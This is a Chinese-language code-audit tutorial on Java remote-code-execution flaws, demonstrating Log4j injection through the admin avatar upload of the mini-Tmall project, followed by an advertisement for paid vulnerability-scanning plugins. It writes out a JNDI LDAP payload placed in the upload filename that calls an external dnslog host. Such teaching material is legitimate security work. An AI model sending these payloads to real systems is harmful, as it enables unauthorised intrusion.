代码审计-Java项目-组件RCE代码执行漏洞审计

发布于 作者:

原文链接: https://mp.weixin.qq.com/s?__biz=Mzg5NDg4MzYzNQ==&mid=2247486562&idx=1&sn=a00c80480f832a5f80b14fafdaa68a42

代码审计-Java项目-组件RCE代码执行漏洞审计

原创 xiaoheizi 小黑子安全 2025-07-17 07:53

代码审计必备知识点:

1

代码审计开始前准备:

环境搭建使用,工具插件安装使用,掌握各种漏洞原理及利用
,
代码开发类知识点。

2、代码审计前信息收集:

审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等。

3、代码审计挖掘漏洞根本:

可控变量及特定函数,不存在过滤或过滤不严谨可以绕过导致的安全漏洞。

4、代码审计展开计划:

审计项目漏洞原理->审计思路->完整源码->应用框架->验证并利用漏洞。

代码审计两种方法

功能点或关键字分析可能存在

漏洞

  • 抓包或搜索关键字找到代码出处及对应文件

  • 追踪过滤或接收的数据函数,寻找触发此函数或代码的地方进行触发测试。

-常规或部分M
VC
模型源码可以采用关键字的搜索挖掘思路。

-框架

MV

墨香源码一般会采用功能点分析抓包追踪挖掘思路。

  1. 搜索关键字找敏感函数

代码审计-Java项目-组件RCE代码执行漏洞审计

  1. 根据目标功能点判断可能存在的漏洞

代码审计-Java项目-组件RCE代码执行漏洞审计

JAVA
项目——
RCE
漏洞产生层面

1
、服务端直接存在可执行函数(
exec
()
等),且对传入的参数过滤不严格导致RCE漏洞

2
、服务端不直接存在可执行函数(
exec
()
等),且对传入的参数过滤不严格导致RCE漏洞

3
、由表达式注入导致的RCE漏洞,如:OGNL、
SpEL
、MVEL、EL、
Fel
、JST
+
EL等

4
、由java后端模板引擎注入导致的RCE漏洞,如:
Freemarker

Velocity

Thymeleaf

5
、由java一些脚本语言引起的RCE漏洞,如:
Groovy

JavascriptEngine

6
、由第三方开源组件引起的RCE漏洞,如:
Fastjson

Shiro

Xstream

Struts2

案例:
第三方框架

迷你
Tmall

Log4j
组件
-RCE
漏洞

  1. 下载
    mini-tmall
    源码,使用
    idea
    打开,部署好环境

代码审计-Java项目-组件RCE代码执行漏洞审计

  1. 审计
    java
    项目,第一步查看
    pom.xml
    文件,发现使用了
    log4j
    组件。

代码审计-Java项目-组件RCE代码执行漏洞审计

  1. 搜索
    log4j
    漏洞,发现
    2.10.0
    版本存在
    RCE
    漏洞。搜索
    log4j
    的关键字
    logger
    ,可以看到项目使用
    logger.info
    级别记录日志方式

代码审计-Java项目-组件RCE代码执行漏洞审计

  1. 经过审计,发现
    AccountController
    .java
    代码文件中日志记录拼接了变量参数,对代码进行分析。发现触发漏洞点的代码为
    logger.info(“获取图片原始文件名:{}”, originalFileName);
    ,向上追踪,发现通过
    file.getOriginalFilename();
    获取
    file
    的文件名后赋值给
    originalFileName
    ,在向上追踪,
    file
    参数来自
    admin/uploadAdminHeadImage
    接口

代码审计-Java项目-组件RCE代码执行漏洞审计

  1. 来到网站找到触发漏洞的管理员头像上传处,上传头像进行抓包

代码审计-Java项目-组件RCE代码执行漏洞审计

  1. 配合
    dnslog
    平台验证漏洞存在。修改数据包中
    filename
    参数为:
    ${jndi:ldap://d6l6.dnslog.ink}

代码审计-Java项目-组件RCE代码执行漏洞审计

  1. 回到
    dnslog
    平台,成功接收到了解析记录,说明漏洞存在。

代码审计-Java项目-组件RCE代码执行漏洞审计

推荐一下作者最新研发的yakit被动漏洞检测插件,可挖掘企业src漏洞。

图片

以上漏洞都是不需要任何技巧的,作者只是开启插件在目标网站用鼠标“点点点点”就挖掘出这么多漏洞,完全

“零基础”“

零成本”挖洞

目前一共开发了四个插件:

被动
sql
注入检测

被动
xss
扫描优化版

被动目录扫描好人版

被动
ssrf

log4j
检测

插件使用效果:记一次企业src漏洞挖掘连爆七个漏洞!

插件使用教程:
新一代SQL注入检测技术,小白也能轻松挖到漏洞!

知识星球——小黑子安全圈
[
精华版
]

开业大吉!

每一个插件都是非常实用的,有没有用作者也已经通过

企业
src 
漏洞的挖掘来证明了,并且只需要开启插件

点击鼠标就可以全自动挖掘漏洞。

需要获取插件的小伙伴可以扫描下方二维码加入我的知识星球,星球
 99

/

,前
50
个加入的
 77

/
年。

加入知识星球的同学会提供

yakit

安装

插件

使用教程。

图片

本星球只提供精华内容,没有烂大街的东西。会持续更新
yakit
插件和各种漏洞探针和利用工具,哪怕你是什么都不懂的小白用了插件点点鼠标就能挖到漏洞。

注!!!红包返现!!!拉新活动!!!

拉新人加入星球待满三天也会返
20
红包
(
微信直接转
)
。插件会一直优化和上新,欢迎大家加入星球。